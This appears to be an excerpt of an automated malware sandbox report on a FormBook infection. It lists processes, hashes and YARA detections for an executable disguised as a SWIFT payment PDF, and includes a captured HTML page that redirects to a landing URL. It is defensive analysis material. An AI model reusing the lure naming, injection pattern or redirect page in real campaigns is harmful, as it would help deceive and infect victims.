2b 79 4a 48 69 43 41 68 68 75 58 30 4b 79 54 48 58 65 45 3d 26 55 4a 3d 37 48 31 58 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mRu=HW/lerOyVqCXu7n0t/EUlYJ02y1yNdHzoGstxvzncQbYfsbQeR2dtxxMvMPrm1eSchBLBkAlfh8ey4GsUHcWZCjdVQ1E0is8tfiw+yJHiCAhhuX0KyTHXeE=&UJ=7H1XM"}</script></head></html>

Target ID:	0
Start time:	09:28:40
Start date:	12/11/2024
Path:	C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
Imagebase:	0x400000
File size:	966'221 bytes
MD5 hash:	FBC1B3A9567B4153601F2F845ECFEDF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	09:28:42
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
Imagebase:	0xc30000
File size:	47'016 bytes
MD5 hash:	B7C999040D80E5BF87886D70D992C51E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1441626408.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1442932990.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1443008474.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Target ID:	11
Start time:	09:29:28
Start date:	12/11/2024
Path:	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe"
Imagebase:	0xb30000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.5958733126.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Target ID:	12
Start time:	09:29:29
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\DevicePairingWizard.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\DevicePairingWizard.exe"
Imagebase:	0x930000
File size:	83'968 bytes
MD5 hash:	2A4C038870FD0083037A7B07FEAAEDE5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.5054439385.0000000004310000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.5054354866.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Target ID:	13
Start time:	09:29:43
Start date:	12/11/2024
Path:	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe"
Imagebase:	0xb30000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.5958070475.00000000014A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Target ID:	14
Start time:	09:29:55
Start date:	12/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff7eb000000
File size:	597'432 bytes
MD5 hash:	FA9F4FC5D7ECAB5A20BF7A9D1251C851
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true